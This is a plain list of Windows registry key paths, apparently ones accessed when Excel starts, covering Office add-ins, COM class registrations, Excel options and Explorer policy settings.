HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\RequireShutdownNotification
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Manifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\OverrideDefaultDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\LoadBehavior
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\RequireShutdownNotification
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\Manifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\Clsid\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\OverrideDefaultDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00024500-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OPEN
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultPath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OpenDir
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAnimations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\Xlstart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AltStartup
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\CoauthDebugMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_17407
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FirstRun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs\AllowUserDefinedFileShareCatalogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_RequireForceRefreshAtBoot
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_RibbonCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\ExcelOMEXRefreshPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_AggregatedCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableCoauthLegacyVersionMitigation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\XLDesktopCoauthActive
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UseClusterConnector
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ClusterConnector
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotCheckIfOfficeIsHTMLEditor
HKEY_LOCAL_MACHINE\Software\Classes\.htm\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\htmlfile\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\htmlfile\shell\print\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\print\command\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\OnlinePollTimeMs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Office Application Guard PreWarm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UseSentinelFile
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\NextUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\NextUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE\RequiredFile
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace_36354489\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace_41040327\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\ValidateRegItems
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\ValidateRegItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\MonitorRegistry
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\MonitorRegistry
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedPC\SharedPCMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HubMode
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HubMode
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes_36354489
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\FolderValueFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\ValidateRegItems
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\MonitorRegistry
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{70ce53cd-0000-0000-0000-500600000000}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{70ce53cd-0000-0000-0000-500600000000}\Generation
HKEY_LOCAL_MACHINE\Software\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer\UseFindFirstFileEnumeration
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
